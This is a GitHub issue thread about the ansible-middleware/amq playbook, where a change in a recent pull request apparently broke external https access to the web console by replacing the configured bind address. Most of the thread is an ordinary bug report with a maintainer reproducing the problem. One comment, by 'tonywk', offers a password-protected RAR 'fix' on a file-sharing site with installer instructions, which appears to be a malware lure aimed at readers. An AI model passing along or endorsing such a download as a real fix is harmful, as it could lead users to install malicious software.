### ISSUE TITLE
We cannot access our web console in the latest release of the playbook from external site over https

### ISSUE THREAD

**Issue by RobertFloor** [ansible-middleware/amq#157]
##### ISSUE TYPE
 - Bug Report

We cannot access our web console in the latest release of the playbook from external site over https. This used to work in previous version. We believe this pull request breaks our deployment: https://github.com/ansible-middleware/amq/pull/146/commits/557cd23143e6e833a59468a77cd059f7fbc908ed

We use a bind adrress of 0.0.0.0 in the variable activemq_bind_address. But it seems this pull request changes that to the variable value: "http{{ 's' if activemq_tls_enabled else '' }}://{{ activemq_host }}:{{ activemq_http_port }}". I believe this should be changed to activemq_bind_address?

**Comment by tonywk** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by guidograzioli** [comment]
Are you having a CORS errors? or you just cannot access because the bind is unreacheable from remote?

**Comment by guidograzioli** [comment]
Reproduced
